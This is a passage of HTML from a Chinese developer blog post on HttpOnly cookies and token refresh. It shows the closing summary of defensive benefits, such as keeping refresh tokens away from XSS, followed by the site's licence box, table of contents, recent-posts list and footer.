<td>刷新失败</td>
<td>清除状态，跳转登录</td>
<td>-</td>
</tr>
</tbody></table>
<p>通过这样的设计，我们可以：</p>
<ul>
<li>避免前端保存敏感的 refresh_token</li>
<li>防止 XSS 攻击获取登录令牌</li>
<li>实现自动续期 + 无感体验</li>
<li>保持前后端的逻辑清晰、职责分离</li>
</ul>
</div><div class="article-licensing box"><div class="licensing-title"><p>HttpOnly Cookie 全解析</p><p><a href="https://fu9zhou.com/2025/07/22/HttpOnly-Cookie-全解析/">https://fu9zhou.com/2025/07/22/HttpOnly-Cookie-全解析/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>作者</h6><p>Fu9Zhou</p></div></div><div class="level-item is-narrow"><div><h6>发布于</h6><p>2025-07-22</p></div></div><div class="level-item is-narrow"><div><h6>许可协议</h6><p><a class="icons" rel="noopener" target="_blank" title="Creative Commons" href="/httpscreativecommons.org/"><i class="icon fab fa-creative-commons"></i></a><a class="icons" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="icon fab fa-creative-commons-by"></i></a><a class="icons" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="icon fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="article-tags is-size-7 mb-4"><span class="mr-2">#</span><a class="link-muted mr-2" rel="tag" href="/tags/JavaScript/">JavaScript</a></div><!--!--></article></div><!--!--><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2025/07/24/%E5%89%8D%E7%AB%AF%E6%97%A0%E6%84%9F%E5%88%B7%E6%96%B0Token/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">前端无感刷新Token</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2025/07/10/%E4%BD%BF%E7%94%A8husky%E8%A7%84%E8%8C%83%E4%BB%A3%E7%A0%81%E6%8F%90%E4%BA%A4/"><span class="level-item">使用husky规范代码提交</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><!--!--></div><!--!--><div class="column column-right is-4-tablet is-4-desktop is-4-widescreen  order-3 is-sticky"><div class="card widget" id="toc" data-type="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">目录</h3><ul class="menu-list"><li><a class="level is-mobile" href="#是什么"><span class="level-left"><span class="level-item">1</span><span class="level-item">是什么</span></span></a></li><li><a class="level is-mobile" href="#怎么用"><span class="level-left"><span class="level-item">2</span><span class="level-item">怎么用</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#服务端设置-Cookie"><span class="level-left"><span class="level-item">2.1</span><span class="level-item">服务端设置 Cookie</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#使用-HTTP-头"><span class="level-left"><span class="level-item">2.1.1</span><span class="level-item">使用 HTTP 头</span></span></a></li><li><a class="level is-mobile" href="#使用-Express-携带"><span class="level-left"><span class="level-item">2.1.2</span><span class="level-item">使用 Express 携带</span></span></a></li></ul></li><li><a class="level is-mobile" href="#前端允许携带-Cookie"><span class="level-left"><span class="level-item">2.2</span><span class="level-item">前端允许携带 Cookie</span></span></a></li><li><a class="level is-mobile" href="#跨域请求注意事项"><span class="level-left"><span class="level-item">2.3</span><span class="level-item">跨域请求注意事项</span></span></a></li></ul></li><li><a class="level is-mobile" href="#局限性"><span class="level-left"><span class="level-item">3</span><span class="level-item">局限性</span></span></a></li><li><a class="level is-mobile" href="#代码实现"><span class="level-left"><span class="level-item">4</span><span class="level-item">代码实现</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#场景设定"><span class="level-left"><span class="level-item">4.1</span><span class="level-item">场景设定</span></span></a></li><li><a class="level is-mobile" href="#后端代码"><span class="level-left"><span class="level-item">4.2</span><span class="level-item">后端代码</span></span></a></li><li><a class="level is-mobile" href="#前端代码"><span class="level-left"><span class="level-item">4.3</span><span class="level-item">前端代码</span></span></a></li><li><a class="level is-mobile" href="#逻辑验证"><span class="level-left"><span class="level-item">4.4</span><span class="level-item">逻辑验证</span></span></a></li><li><a class="level is-mobile" href="#流程小结"><span class="level-left"><span class="level-item">4.5</span><span class="level-item">流程小结</span></span></a></li></ul></li></ul></div></div><style>#toc .menu-list > li > a.is-active + .menu-list { display: block; }#toc .menu-list > li > a + .menu-list { display: none; }</style><script src="/js/toc.js" defer></script></div><div class="card widget" data-type="recent-posts"><div class="card-content"><h3 class="menu-label">最新文章</h3><article class="media"><div class="media-content"><p class="date"><time dateTime="2025-07-24T10:42:53.000Z">2025-07-24</time></p><p class="title"><a href="/2025/07/24/%E5%89%8D%E7%AB%AF%E6%97%A0%E6%84%9F%E5%88%B7%E6%96%B0Token/">前端无感刷新Token</a></p><p class="categories"><a href="/categories/%E5%89%8D%E7%AB%AF/">前端</a> / <a href="/categories/%E5%89%8D%E7%AB%AF/%E6%8A%80%E6%9C%AF%E5%AE%9E%E7%8E%B0/">技术实现</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2025-07-22T11:05:18.000Z">2025-07-22</time></p><p class="title"><a href="/2025/07/22/HttpOnly-Cookie-%E5%85%A8%E8%A7%A3%E6%9E%90/">HttpOnly Cookie 全解析</a></p><p class="categories"><a href="/categories/%E5%89%8D%E7%AB%AF/">前端</a> / <a href="/categories/%E5%89%8D%E7%AB%AF/%E6%8A%80%E6%9C%AF%E5%AE%9E%E7%8E%B0/">技术实现</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2025-07-10T11:27:00.000Z">2025-07-10</time></p><p class="title"><a href="/2025/07/10/%E4%BD%BF%E7%94%A8husky%E8%A7%84%E8%8C%83%E4%BB%A3%E7%A0%81%E6%8F%90%E4%BA%A4/">使用husky规范代码提交</a></p><p class="categories"><a href="/categories/%E8%BD%AF%E7%A1%AC%E4%BB%B6%E8%AE%BE%E5%A4%87/">软硬件设备</a> / <a href="/categories/%E8%BD%AF%E7%A1%AC%E4%BB%B6%E8%AE%BE%E5%A4%87/%E5%BC%80%E5%8F%91%E7%9B%B8%E5%85%B3/">开发相关</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2025-07-07T13:18:04.000Z">2025-07-07</time></p><p class="title"><a href="/2025/07/07/tRPC%E9%80%9A%E4%BF%A1/">tRPC通信</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2025-07-07T13:09:46.000Z">2025-07-07</time></p><p class="title"><a href="/2025/07/07/SuperJSON%E5%A4%84%E7%90%86%E5%89%8D%E5%90%8E%E7%AB%AF%E4%BC%A0%E5%80%BC/">SuperJSON处理前后端传值</a></p><p class="categories"><a href="/categories/%E5%89%8D%E7%AB%AF/">前端</a> / <a href="/categories/%E5%89%8D%E7%AB%AF/%E5%BA%93%E5%92%8C%E6%A1%86%E6%9E%B6/">库和框架</a></p></div></article></div></div></div></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/img/logo.png" alt="小江的技术分享" height="28"></a><p class="is-size-7"><span>&copy; 2026 Fu9Zhou</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a><br><span id="busuanzi_container_site_uv">共<span id="busuanzi_value_site_uv">0</span>个访客</span></p><p class="is-size-7"> <p><a style="color:#4a4a4a;" target="_blank" rel="noopener" href="https://beian.miit.gov.cn/">闽ICP备2025084052号-1</a></p> <p><a style="color:#4a4a4a;" target="_blank" rel="noopener" href="http://copyright.fjxuanchuan.cn/api/qkl/File/media/nas/newFileModel/2025/1/10/1944ee8d7655b8909fb6fe14d379a7e29a50da53eb4/OwnerCertificate.jpg">闽作登字-2025-F-00008490</a></p> <p> <img src="/img/gwab.png" style="width: 16px;"> <a style="color:#4a4a4a;" target="_blank" rel="noopener" href="https://beian.mps.gov.cn/#/query/webSearch?code=35010402351694">闽公网安备35010402351694号</a> </p> </p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="GitHub" href="https://github.com/fu9zhou"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><script>moment.locale("zh-cn");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script data-pjax src="/js/column.js"></script><script src="/js/animation.js"></script><a id="back-to-top" title="回到顶端" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script data-pjax src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/pjax@0.2.8/pjax.min.js"></script><script src="/js/pjax.js"></script><!--!--><!--!--><!--!--><script data-pjax src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="想要查找什么..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script data-pjax src="/js/insight.js" defer></script><script data-pjax>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"想要查找什么...","untitled":"(无标题)","posts":"文章","pages":"页面","categories":"分类","tags":"标签"});
        });</script></body></html>